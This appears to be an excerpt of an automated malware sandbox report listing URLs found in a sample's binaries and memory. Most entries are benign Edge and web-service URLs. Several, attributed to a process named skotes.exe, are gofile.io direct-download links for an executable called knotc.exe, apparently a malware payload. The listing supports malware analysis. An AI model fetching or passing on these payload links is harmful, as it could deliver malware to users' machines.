                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.6.8/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_hc.png/1.0.3/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_dark.png/1.0.3/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_light.png/1.0.3/asse
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_deezer.png/1.4.12/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_dark.png/1.0.6/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_light.png/1.0.6/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_color.png/1.0.14/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_hc.png/1.0.14/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_hc.png/1.1.12/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_dark.png/1.1.12/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_hc.png/1.2.0/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_dark.png/1.2.0/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_light.png/1.2.0/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_excel.png/1.7.32/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_facebook_messenger.png/1.5.14/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gaana.png/1.0.3/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc.png/1.7.1/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_controller.png/1.7.1/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_joystick.png/1.7.1/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark.png/1.7.1/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_controller.png/1.7.1/
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_joystick.png/1.7.1/as
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_controller.png/1.7.1
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_joystick.png/1.7.1/a
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gmail.png/1.5.4/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_help.png/1.0.0/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_hc.png/0.1.3/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_dark.png/0.1.3/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_light.png/0.1.3/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_iHeart.png/1.0.3/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_hc.png/1.0.14/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_dark.png/1.0.14/as
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_light.png/1.0.14/a
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_instagram.png/1.4.13/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_ku_gou.png/1.0.3/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_last.png/1.0.3/asset
                      Source: 000003.log4.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Sho
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_dark.png/1.1.0/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_hc.png/1.1.0/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_light.png/1.1.0/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_naver_vibe.png/1.0.3/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_dark.png/1.4.9/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_hc.png/1.4.9/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_light.png/1.4.9/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_dark.png/1.9.10/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_hc.png/1.9.10/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_light.png/1.9.10/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_hc.png/1.1.0/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_dark.png/1.1.0/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_light.png/1.1.0/asse
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_power_point.png/1.7.32/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_qq.png/1.0.3/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_dark.png/1.1.12/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_hc.png/1.1.12/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_light.png/1.1.12/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_hc.png/1.1.3/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_dark.png/1.1.3/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_light.png/1.1.3/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_hc.png/1.3.6/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_dark.png/1.3.6/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.1.12/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.4.0/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.5.13/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.1.12/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.4.0/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.5.13/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.1.12/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.4.0/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.5.13/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_hc.png/1.4.0/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_dark.png/1.4.0/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_dark.png/1.3.20/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_hc.png/1.3.20/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_light.png/1.3.20/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_sound_cloud.png/1.0.3/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_spotify.png/1.4.12/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_dark.png/1.2.19/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_hc.png/1.2.19/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_light.png/1.2.19/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_telegram.png/1.0.4/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_hc.png/1.0.5/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_dark.png/1.0.5/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_light.png/1.0.5/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tidal.png/1.0.3/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tik_tok_light.png/1.0.5/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_hc.png/1.5.13/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_dark.png/1.5.13/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_twitter_light.png/1.0.9/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_vk.png/1.0.3/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whats_new.png/1.0.0/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whatsapp_light.png/1.4.11/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_word.png/1.7.32/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_yandex_music.png/1.0.10/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_youtube.png/1.4.14/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://excel.new?from=EdgeM365Shoreline
                      Source: skotes.exe, 0000001F.00000003.2121426466.00000000012E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://file4.gofile.io/
                      Source: skotes.exe, 0000001F.00000002.2529002580.000000000128F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://file4.gofile.io/Certificates
                      Source: skotes.exe, 0000001F.00000002.2529002580.00000000012BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://file4.gofile.io/download/direct/79b47216-17a9-4db2-9e53-0d70fd5ed1e5/knotc.exe
                      Source: skotes.exe, 0000001F.00000003.2510002187.00000000012E6000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000001F.00000002.2530110803.00000000012E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://file4.gofile.io/download/direct/79b47216-17a9-4db2-9e53-0d70fd5ed1e5/knotc.exe3
                      Source: skotes.exe, 0000001F.00000003.2121237291.00000000012E6000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000001F.00000003.2510002187.00000000012E6000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000001F.00000002.2530110803.00000000012E7000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000001F.00000003.2121426466.00000000012E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://file4.gofile.io/download/direct/79b47216-17a9-4db2-9e53-0d70fd5ed1e5/knotc.exeg
                      Source: skotes.exe, 0000001F.00000003.2121237291.00000000012E6000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000001F.00000003.2510002187.00000000012E6000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000001F.00000002.2530110803.00000000012E7000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000001F.00000003.2121426466.00000000012E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://file4.gofile.io/download/direct/79b47216-17a9-4db2-9e53-0d70fd5ed1e5/knotc.exek
                      Source: skotes.exe, 0000001F.00000002.2529002580.000000000128F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://file4.gofile.io/llowedCert_OS_1
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://gaana.com/
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://i.y.qq.com/n2/m/index.html
                      Source: 2cc80dabc69f58b6_1.15.drString found in binary or memory: https://img-s-msn-com.akamaized.net/
                      Source: 2cc80dabc69f58b6_1.15.drString found in binary or memory: https://img-s.msn.cn/tenant/amp/entityid/
                      Source: file.exe, 00000002.00000002.1858312701.0000000023E41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://latest.web.skype.com/?browsername=edge_canary_shoreline
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://m.kugou.com/
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://m.soundcloud.com/
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://m.vk.com/
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://mail.google.com/mail/mu/mp/266/#tl/Inbox
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://manifestdeliveryservice.edgebrowser.microsoft-staging-falcon.io/app/page-context-demo
                      Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.drString found in binary or memory: https://mozilla.org0/
                      Source: Cookies.16.drString found in binary or memory: https://msn.comXID/
                      Source: Cookies.16.drString found in binary or memory: https://msn.comXIDv10
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://music.amazon.com
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://music.apple.com
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://music.yandex.com
                      Source: 2cc80dabc69f58b6_1.15.drString found in binary or memory: https://ntp.msn.cn/edge/ntp
                      Source: 000003.log1.15.drString found in binary or memory: https://ntp.msn.com
                      Source: 000003.log7.15.dr, 000003.log9.15.drString found in binary or memory: https://ntp.msn.com/
                      Source: 000003.log7.15.drString found in binary or memory: https://ntp.msn.com/0
                      Source: QuotaManager.15.drString found in binary or memory: https://ntp.msn.com/_default
                      Source: 000003.log7.15.dr, 2cc80dabc69f58b6_1.15.drString found in binary or memory: https://ntp.msn.com/edge/ntp
                      Source: 2cc80dabc69f58b6_1.15.drString found in binary or memory: https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=288
                      Source: Session_13377174554668050.15.drString found in binary or memory: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&start
                      Source: QuotaManager.15.drString found in binary or memory: https://ntp.msn.com/ntp.msn.com_default
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://open.spotify.com
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://outlook.live.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://outlook.live.com/mail/0/
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://outlook.live.com/mail/compose?isExtension=true
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://outlook.office.com/mail/0/
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://outlook.office.com/mail/compose?isExtension=true
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://outlook.office.com/mail/inbox?isExtension=true&sharedHeader=1&client_flight=outlookedge
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://powerpoint.new?from=EdgeM365Shoreline
                      Source: 2cc80dabc69f58b6_1.15.drString found in binary or memory: https://sb.scorecardresearch.com/
                      Source: 2cc80dabc69f58b6_1.15.drString found in binary or memory: https://srtb.msn.cn/
                      Source: 2cc80dabc69f58b6_1.15.drString found in binary or memory: https://srtb.msn.com/
                      Source: skotes.exe, 0000001F.00000002.2529002580.0000000001279000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store1.gofile.io/
                      Source: skotes.exe, 0000001F.00000003.2121237291.00000000012E6000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000001F.00000002.2529002580.000000000123B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000001F.00000002.2529002580.0000000001279000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000001F.00000002.2529002580.000000000128F000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000001F.00000003.2121397753.000000000131E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store1.gofile.io/download/direct/79b47216-17a9-4db2-9e53-0d70fd5ed1e5/knotc.exe
                      Source: skotes.exe, 0000001F.00000002.2529002580.0000000001279000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store1.gofile.io/download/direct/79b47216-17a9-4db2-9e53-0d70fd5ed1e5/knotc.exe09b
                      Source: skotes.exe, 0000001F.00000002.2529002580.0000000001279000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store1.gofile.io/download/direct/79b47216-17a9-4db2-9e53-0d70fd5ed1e5/knotc.exe09bc
                      Source: skotes.exe, 0000001F.00000002.2529002580.000000000128F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store1.gofile.io/download/direct/79b47216-17a9-4db2-9e53-0d70fd5ed1e5/knotc.exe09bc8ab4febaf
                      Source: skotes.exe, 0000001F.00000002.2529002580.0000000001279000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store1.gofile.io/download/direct/79b47216-17a9-4db2-9e53-0d70fd5ed1e5/knotc.exe09bc8ad
                      Source: skotes.exe, 0000001F.00000002.2529002580.000000000128F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store1.gofile.io/download/direct/79b47216-17a9-4db2-9e53-0d70fd5ed1e5/knotc.exeW
                      Source: skotes.exe, 0000001F.00000002.2530110803.00000000012E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store1.gofile.io/download/direct/79b47216-17a9-4db2-9e53-0d70fd5ed1e5/knotc.exel
                      Source: skotes.exe, 0000001F.00000002.2529002580.0000000001279000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store1.gofile.io/x
                      Source: file.exe, 00000002.00000002.1825004684.0000000000E37000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                      Source: file.exe, 00000002.00000003.1724983706.000000002409E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://tidal.com/
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://twitter.com/
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://vibe.naver.com/today
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://web.skype.com/?browsername=edge_canary_shoreline
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://web.skype.com/?browsername=edge_stable_shoreline
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://web.telegram.org/
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://web.whatsapp.com
